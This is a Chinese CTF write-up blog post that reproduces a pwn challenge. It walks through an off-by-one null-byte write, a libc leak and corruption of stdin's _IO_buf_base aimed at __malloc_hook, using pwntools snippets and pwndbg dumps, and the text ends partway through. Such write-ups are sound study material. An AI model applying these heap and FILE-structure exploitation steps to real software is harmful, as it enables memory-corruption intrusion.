<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.4.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"example.com","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":false},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":false,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}}};
  </script>

  <meta name="description" content="stackoverflow 复现 123456➜  桌面 .&#x2F;stackoverflowleave your name, bro:ywxworrier ywx, now begin your challengeWelcome to stackoverflow challenge!!!it is really easyplease input the size to trigger stackove">
<meta property="og:type" content="article">
<meta property="og:title" content="Stdin任意写">
<meta property="og:url" content="http://example.com/2022/04/02/stdin%E4%BB%BB%E6%84%8F%E5%86%99/index.html">
<meta property="og:site_name" content="Pwn进你的心">
<meta property="og:description" content="stackoverflow 复现 123456➜  桌面 .&#x2F;stackoverflowleave your name, bro:ywxworrier ywx, now begin your challengeWelcome to stackoverflow challenge!!!it is really easyplease input the size to trigger stackove">
<meta property="og:locale" content="en_US">
<meta property="article:published_time" content="2022-04-01T17:49:44.000Z">
<meta property="article:modified_time" content="2022-04-03T09:19:27.227Z">
<meta property="article:author" content="yhellow">
<meta property="article:tag" content="hook">
<meta property="article:tag" content="stdin read">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://example.com/2022/04/02/stdin%E4%BB%BB%E6%84%8F%E5%86%99/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'en'
  };
</script>

  <title>Stdin任意写 | Pwn进你的心</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="Toggle navigation bar">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Pwn进你的心</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>Home</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>Tags</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>Categories</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>Archives</a>

  </li>
  </ul>
</nav>




</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="en">
    <link itemprop="mainEntityOfPage" href="http://example.com/2022/04/02/stdin%E4%BB%BB%E6%84%8F%E5%86%99/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="yhellow">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Pwn进你的心">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Stdin任意写
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">Posted on</span>

              <time title="Created: 2022-04-02 01:49:44" itemprop="dateCreated datePublished" datetime="2022-04-02T01:49:44+08:00">2022-04-02</time>
            </span>
              <span class="post-meta-item">
                <span class="post-meta-item-icon">
                  <i class="far fa-calendar-check"></i>
                </span>
                <span class="post-meta-item-text">Edited on</span>
                <time title="Modified: 2022-04-03 17:19:27" itemprop="dateModified" datetime="2022-04-03T17:19:27+08:00">2022-04-03</time>
              </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">In</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/Reappearance/" itemprop="url" rel="index"><span itemprop="name">Reappearance</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="Views" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="eye"></i>
              </span>
              <span class="post-meta-item-text">Views: </span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
            <span class="post-meta-item" title="Symbols count in article">
              <span class="post-meta-item-icon">
                <i class="far fa-file-word"></i>
              </span>
              <span>10k</span>
            </span>
            <span class="post-meta-item" title="Reading time">
              <span class="post-meta-item-icon">
                <i class="far fa-clock"></i>
              </span>
              <span>9 mins.</span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><strong>stackoverflow 复现</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">➜  桌面 ./stackoverflow</span><br><span class="line">leave your name, bro:ywx</span><br><span class="line">worrier ywx</span><br><span class="line">, now begin your challengeWelcome to stackoverflow challenge!!!</span><br><span class="line">it is really easy</span><br><span class="line">please input the size to trigger stackoverflow: </span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">stackoverflow: ELF <span class="number">64</span>-bit LSB executable, x86<span class="number">-64</span>, version <span class="number">1</span> (SYSV), dynamically linked, interpreter /home/yhellow/tools/glibc-all-in-one/libs/<span class="number">2.24</span><span class="number">-9u</span>buntu2_amd64/ld<span class="number">-2.24</span>.so, <span class="keyword">for</span> GNU/Linux <span class="number">2.6</span><span class="number">.32</span>, BuildID[sha1]=<span class="number">8f</span>56f5f4fdfef79fe7ba6b8b8b042d5ee2b6101b, stripped</span><br><span class="line"></span><br><span class="line">[*] <span class="string">&#x27;/home/yhellow/\xe6\xa1\x8c\xe9\x9d\xa2/stackoverflow&#x27;</span></span><br><span class="line">    Arch:     amd64<span class="number">-64</span>-little</span><br><span class="line">    RELRO:    Full RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (<span class="number">0x3ff000</span>)</span><br><span class="line">    RUNPATH:  <span class="string">&#x27;/home/yhellow/tools/glibc-all-in-one/libs/2.24-9ubuntu2_amd64/&#x27;</span></span><br></pre></td></tr></table></figure>
<p>64位，dynamically，开了NX，开了canary，Full RELRO</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">GNU C <span class="title">Library</span> <span class="params">(Ubuntu GLIBC <span class="number">2.24</span><span class="number">-9u</span>buntu2<span class="number">.2</span>)</span> stable release versi</span></span><br></pre></td></tr></table></figure>
<p><strong>漏洞分析</strong></p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">unsigned</span> __int64 <span class="title">leak</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">char</span> v1[<span class="number">104</span>]; <span class="comment">// [rsp+0h] [rbp-70h] BYREF</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 canary; <span class="comment">// [rsp+68h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  canary = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;leave your name, bro:&quot;</span>);</span><br><span class="line">  read_s(v1, <span class="number">80</span>);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;worrier %s, now begin your challenge&quot;</span>, v1);</span><br><span class="line">  <span class="keyword">return</span> __readfsqword(<span class="number">0x28</span>u) ^ canary;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这个函数没有溢出，就是让我们来 leak libc_base 的</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">__int64 <span class="title">pwn</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">  <span class="keyword">int</span> data; <span class="comment">// [rsp+8h] [rbp-18h] BYREF</span></span><br><span class="line">  <span class="keyword">int</span> v2; <span class="comment">// [rsp+Ch] [rbp-14h]</span></span><br><span class="line">  <span class="keyword">void</span> *v3; <span class="comment">// [rsp+10h] [rbp-10h]</span></span><br><span class="line">  <span class="keyword">unsigned</span> __int64 v4; <span class="comment">// [rsp+18h] [rbp-8h]</span></span><br><span class="line"></span><br><span class="line">  v4 = __readfsqword(<span class="number">0x28</span>u);</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;please input the size to trigger stackoverflow: &quot;</span>);</span><br><span class="line">  _isoc99_scanf(<span class="string">&quot;%d&quot;</span>, &amp;data);</span><br><span class="line">  IO_getc(<span class="built_in">stdin</span>);</span><br><span class="line">  v2 = data;</span><br><span class="line">  <span class="keyword">while</span> ( data &gt; <span class="number">3145728</span> )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">puts</span>(<span class="string">&quot;too much bytes to do stackoverflow.&quot;</span>);</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;please input the size to trigger stackoverflow: &quot;</span>);</span><br><span class="line">    _isoc99_scanf(<span class="string">&quot;%d&quot;</span>, &amp;data);</span><br><span class="line">    IO_getc(<span class="built_in">stdin</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  v3 = <span class="built_in">malloc</span>(<span class="number">0x28</span>uLL);</span><br><span class="line">  chunk_list = (__int64)<span class="built_in">malloc</span>(data + <span class="number">1</span>);</span><br><span class="line">  <span class="keyword">if</span> ( !chunk_list )</span><br><span class="line">  &#123;</span><br><span class="line">    <span class="built_in">printf</span>(<span class="string">&quot;Error!&quot;</span>);</span><br><span class="line">    <span class="built_in">exit</span>(<span class="number">0</span>);</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="built_in">printf</span>(<span class="string">&quot;padding and ropchain: &quot;</span>);</span><br><span class="line">  read_s((<span class="keyword">void</span> *)chunk_list, data);</span><br><span class="line">  *(_BYTE *)(chunk_list + v2) = <span class="number">0</span>;              <span class="comment">// 末尾置空:off-by-one</span></span><br><span class="line">  <span class="keyword">return</span> <span class="number">0LL</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>末尾字节置空，导致 off-by-one</p>
<p>data 的大小不能超过“3145728”，否则重新输入，但是后面却根据“v2”的大小来进行索引置空，也许有用</p>
<p><strong>入侵思路</strong></p>
<p>先获取 libc_base </p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; <span class="built_in">stack</span> <span class="number">50</span></span><br><span class="line"><span class="number">00</span>:<span class="number">0000</span>│ rsp <span class="number">0x7fffffffde60</span> ◂— <span class="number">0x5000000000</span></span><br><span class="line"><span class="number">01</span>:<span class="number">0008</span>│     <span class="number">0x7fffffffde68</span> —▸ <span class="number">0x7fffffffde90</span> ◂— <span class="number">0x3131313131313131</span> (<span class="string">&#x27;11111111&#x27;</span>)</span><br><span class="line"><span class="number">02</span>:<span class="number">0010</span>│     <span class="number">0x7fffffffde70</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">03</span>:<span class="number">0018</span>│     <span class="number">0x7fffffffde78</span> ◂— <span class="number">0x2711fc69c0f4a500</span></span><br><span class="line"><span class="number">04</span>:<span class="number">0020</span>│ rbp <span class="number">0x7fffffffde80</span> —▸ <span class="number">0x7fffffffdf00</span> —▸ <span class="number">0x7fffffffdf20</span> —▸ <span class="number">0x400ae0</span> ◂— <span class="number">0x41ff894156415741</span></span><br><span class="line"><span class="number">05</span>:<span class="number">0028</span>│     <span class="number">0x7fffffffde88</span> —▸ <span class="number">0x400a34</span> ◂— <span class="number">0xbfc6894890458d48</span></span><br><span class="line"><span class="number">06</span>:<span class="number">0030</span>│ rsi <span class="number">0x7fffffffde90</span> ◂— <span class="number">0x3131313131313131</span> (<span class="string">&#x27;11111111&#x27;</span>)</span><br><span class="line"><span class="number">07</span>:<span class="number">0038</span>│     <span class="number">0x7fffffffde98</span> —▸ <span class="number">0x7ffff7a8dd0a</span> (_IO_default_xsgetn+<span class="number">634</span>) ◂— <span class="number">0x554100401f0fffff</span></span><br><span class="line"><span class="number">08</span>:<span class="number">0040</span>│     <span class="number">0x7fffffffdea0</span> ◂— <span class="number">0x0</span></span><br><span class="line"><span class="number">09</span>:<span class="number">0048</span>│     <span class="number">0x7fffffffdea8</span> —▸ <span class="number">0x7ffff7dd2600</span> (_IO_2_1_stdout_) ◂— <span class="number">0xfbad2887</span></span><br></pre></td></tr></table></figure>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(<span class="string">&#x27;leave your name, bro:&#x27;</span>)</span><br><span class="line">p.send(<span class="string">&#x27;1&#x27;</span>*<span class="number">8</span>)</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;worrier 11111111&#x27;</span>)</span><br><span class="line">leak_addr=u64(p.recvuntil(<span class="string">&#x27;,&#x27;</span>)[:-<span class="number">1</span>].ljust(<span class="number">8</span>,<span class="string">&#x27;\x00&#x27;</span>))</span><br><span class="line">libc_base=leak_addr-<span class="number">515410</span></span><br><span class="line">malloc_hook=libc_base+libc.sym[<span class="string">&#x27;__malloc_hook&#x27;</span>]</span><br><span class="line">success(<span class="string">&#x27;leak_addr &gt;&gt; &#x27;</span>+<span class="built_in">hex</span>(leak_addr))</span><br><span class="line">success(<span class="string">&#x27;libc_base &gt;&gt; &#x27;</span>+<span class="built_in">hex</span>(libc_base))</span><br><span class="line">success(<span class="string">&#x27;malloc_hook &gt;&gt; &#x27;</span>+<span class="built_in">hex</span>(malloc_hook))</span><br></pre></td></tr></table></figure>
<p>程序有 off-by-one ，但和传统菜单题还不一样，它没有修改模块或者释放模块，只能进行申请操作，并且申请之后的 chunk 只有一次输入机会，此后便不能控制了</p>
<p>我用已知的知识就只能走到这里了（后面的内容涉及到 stdin_任意写）</p>
<p>libc-2.24 版本有一个特点：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; p *<span class="built_in">stdin</span></span><br><span class="line">$<span class="number">1</span> = &#123;</span><br><span class="line">  _flags = <span class="number">-72540021</span>,</span><br><span class="line">  _IO_read_ptr = <span class="number">0x7febfb4bd943</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;\n&quot;</span>,</span><br><span class="line">  _IO_read_end = <span class="number">0x7febfb4bd943</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;\n&quot;</span>,</span><br><span class="line">  _IO_read_base = <span class="number">0x7febfb4bd943</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;\n&quot;</span>,</span><br><span class="line">  _IO_write_base = <span class="number">0x7febfb4bd943</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;\n&quot;</span>,</span><br><span class="line">  _IO_write_ptr = <span class="number">0x7febfb4bd943</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;\n&quot;</span>,</span><br><span class="line">  _IO_write_end = <span class="number">0x7febfb4bd943</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;\n&quot;</span>,</span><br><span class="line">  _IO_buf_base = <span class="number">0x7febfb4bd943</span> &lt;_IO_2_1_stdin_+<span class="number">131</span>&gt; <span class="string">&quot;\n&quot;</span>,</span><br><span class="line">  _IO_buf_end = <span class="number">0x7febfb4bd944</span> &lt;_IO_2_1_stdin_+<span class="number">132</span>&gt; <span class="string">&quot;&quot;</span>,</span><br><span class="line">  _IO_save_base = <span class="number">0x0</span>,</span><br><span class="line">  _IO_backup_base = <span class="number">0x0</span>,</span><br><span class="line">  _IO_save_end = <span class="number">0x0</span>,</span><br><span class="line">  _markers = <span class="number">0x0</span>,</span><br><span class="line">  _chain = <span class="number">0x0</span>,</span><br><span class="line">  _fileno = <span class="number">0</span>,</span><br><span class="line">  _flags2 = <span class="number">16</span>,</span><br><span class="line">  _old_offset = <span class="number">-1</span>,</span><br><span class="line">  _cur_column = <span class="number">0</span>,</span><br><span class="line">  _vtable_offset = <span class="number">0</span> <span class="string">&#x27;\000&#x27;</span>,</span><br><span class="line">  _shortbuf = <span class="string">&quot;\n&quot;</span>,</span><br><span class="line">  _lock = <span class="number">0x7febfb4bf770</span> &lt;_IO_stdfile_0_lock&gt;,</span><br><span class="line">  _offset = <span class="number">-1</span>,</span><br><span class="line">  _codecvt = <span class="number">0x0</span>,</span><br><span class="line">  _wide_data = <span class="number">0x7febfb4bd9a0</span> &lt;_IO_wide_data_0&gt;,</span><br><span class="line">  _freeres_list = <span class="number">0x0</span>,</span><br><span class="line">  _freeres_buf = <span class="number">0x0</span>,</span><br><span class="line">  __pad5 = <span class="number">0</span>,</span><br><span class="line">  _mode = <span class="number">-1</span>,</span><br><span class="line">  _unused2 = <span class="string">&#x27;\000&#x27;</span> &lt;repeats <span class="number">19</span> times&gt;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">20</span>xg &amp; *<span class="built_in">stdin</span></span><br><span class="line"><span class="number">0x7febfb4bd8c0</span> &lt;_IO_2_1_stdin_&gt;:	<span class="number">0x00000000fbad208b</span>	<span class="number">0x00007febfb4bd943</span></span><br><span class="line"><span class="number">0x7febfb4bd8d0</span> &lt;_IO_2_1_stdin_+<span class="number">16</span>&gt;:	<span class="number">0x00007febfb4bd943</span>	<span class="number">0x00007febfb4bd943</span></span><br><span class="line"><span class="number">0x7febfb4bd8e0</span> &lt;_IO_2_1_stdin_+<span class="number">32</span>&gt;:	<span class="number">0x00007febfb4bd943</span>	<span class="number">0x00007febfb4bd943</span></span><br><span class="line">    <span class="comment">/* _IO_write_base  _IO_write_ptr */</span></span><br><span class="line"><span class="number">0x7febfb4bd8f0</span> &lt;_IO_2_1_stdin_+<span class="number">48</span>&gt;:	<span class="number">0x00007febfb4bd943</span>	<span class="number">0x00007febfb4bd943</span></span><br><span class="line">    <span class="comment">/* _IO_write_end  _IO_buf_base */</span></span><br><span class="line"><span class="number">0x7febfb4bd900</span> &lt;_IO_2_1_stdin_+<span class="number">64</span>&gt;:	<span class="number">0x00007febfb4bd944</span>	<span class="number">0x0000000000000000</span></span><br><span class="line">    <span class="comment">/* _IO_buf_end */</span></span><br><span class="line"><span class="number">0x7febfb4bd910</span> &lt;_IO_2_1_stdin_+<span class="number">80</span>&gt;:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br></pre></td></tr></table></figure>
<p><code>stdin</code> 结构体中存储 <code>_IO_buf_end</code> 指针内存地址的末尾刚好为 <code>\x00</code> ，若利用漏洞我们将 <code>_IO_buf_base</code> 末尾写 <code>\x00</code> ，则会使得 <code>_IO_buf_base</code> 指向 <code>stdin</code> 结构体中存储 <code>_IO_buf_end</code> 指针内存地址，即可利用输入缓冲区覆盖 <code>_IO_buf_end</code> </p>
<p>接下来就是思考怎样才能把“\x00”覆盖到 “_IO_buf_base”</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; telescope <span class="number">0x7ff3a17db010</span></span><br><span class="line"><span class="number">00</span>:<span class="number">0000</span>│  <span class="number">0x7ff3a17db010</span> ◂— <span class="number">0x61616161</span> <span class="comment">/* &#x27;aaaa&#x27; */</span></span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">20</span>xg &amp; *<span class="built_in">stdin</span></span><br><span class="line"><span class="number">0x7ff3a1d9d8c0</span> &lt;_IO_2_1_stdin_&gt;:	<span class="number">0x00000000fbad208b</span>	<span class="number">0x00007ff3a1d9d943</span></span><br><span class="line"><span class="number">0x7ff3a1d9d8d0</span> &lt;_IO_2_1_stdin_+<span class="number">16</span>&gt;:	<span class="number">0x00007ff3a1d9d943</span>	<span class="number">0x00007ff3a1d9d943</span></span><br><span class="line"><span class="number">0x7ff3a1d9d8e0</span> &lt;_IO_2_1_stdin_+<span class="number">32</span>&gt;:	<span class="number">0x00007ff3a1d9d943</span>	<span class="number">0x00007ff3a1d9d943</span></span><br><span class="line">    <span class="comment">/* _IO_write_base  _IO_write_ptr */</span></span><br><span class="line"><span class="number">0x7ff3a1d9d8f0</span> &lt;_IO_2_1_stdin_+<span class="number">48</span>&gt;:	<span class="number">0x00007ff3a1d9d943</span>	<span class="number">0x00007ff3a1d9d943</span></span><br><span class="line">    <span class="comment">/* _IO_write_end  _IO_buf_base */</span></span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">In [<span class="number">7</span>]: <span class="number">0x7ff3a1d9d8f0</span>+<span class="number">0x8</span><span class="number">-0x7ff3a17db010</span></span><br><span class="line">Out[<span class="number">7</span>]: <span class="number">6039784</span></span><br><span class="line"></span><br><span class="line">In [<span class="number">8</span>]: hex(<span class="number">6039784</span>)</span><br><span class="line">Out[<span class="number">8</span>]: <span class="string">&#x27;0x5c28e8&#x27;</span></span><br></pre></td></tr></table></figure>
<p>已知了偏移，就可以写入以下代码：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">p.recvuntil(<span class="string">&#x27;please input the size to trigger stackoverflow: &#x27;</span>)</span><br><span class="line">p.sendline(<span class="built_in">str</span>(<span class="number">0x5c28e8</span>))</span><br><span class="line">add(<span class="number">0x200000</span>,<span class="string">&#x27;aaaa&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">&#x27;please input the size to trigger stackoverflow: &#x27;</span>)</span><br><span class="line">p.send(p64(malloc_hook+<span class="number">8</span>))</span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">20</span>xg &amp; *<span class="built_in">stdin</span></span><br><span class="line"><span class="number">0x7f68f09198c0</span> &lt;_IO_2_1_stdin_&gt;:	<span class="number">0x00000000fbad208b</span>	<span class="number">0x00007f68f0919900</span></span><br><span class="line"><span class="number">0x7f68f09198d0</span> &lt;_IO_2_1_stdin_+<span class="number">16</span>&gt;:	<span class="number">0x00007f68f0919900</span>	<span class="number">0x00007f68f0919900</span></span><br><span class="line"><span class="number">0x7f68f09198e0</span> &lt;_IO_2_1_stdin_+<span class="number">32</span>&gt;:	<span class="number">0x00007f68f0919900</span>	<span class="number">0x00007f68f0919900</span></span><br><span class="line"><span class="number">0x7f68f09198f0</span> &lt;_IO_2_1_stdin_+<span class="number">48</span>&gt;:	<span class="number">0x00007f68f0919900</span>	<span class="number">0x00007f68f0919900</span></span><br><span class="line"><span class="number">0x7f68f0919900</span> &lt;_IO_2_1_stdin_+<span class="number">64</span>&gt;:	<span class="number">0x00007f68f0919944</span>	<span class="number">0x0000000000000000</span></span><br><span class="line">    <span class="comment">/* 把_IO_buf_base尾字节置空以后,其他的字段都置空了(除了_IO_buf_end) */</span></span><br><span class="line">    <span class="comment">/* 因为程序用setvbuf关闭了输入输出缓冲区,所以它们4个都是同步的(一样) */</span></span><br></pre></td></tr></table></figure>
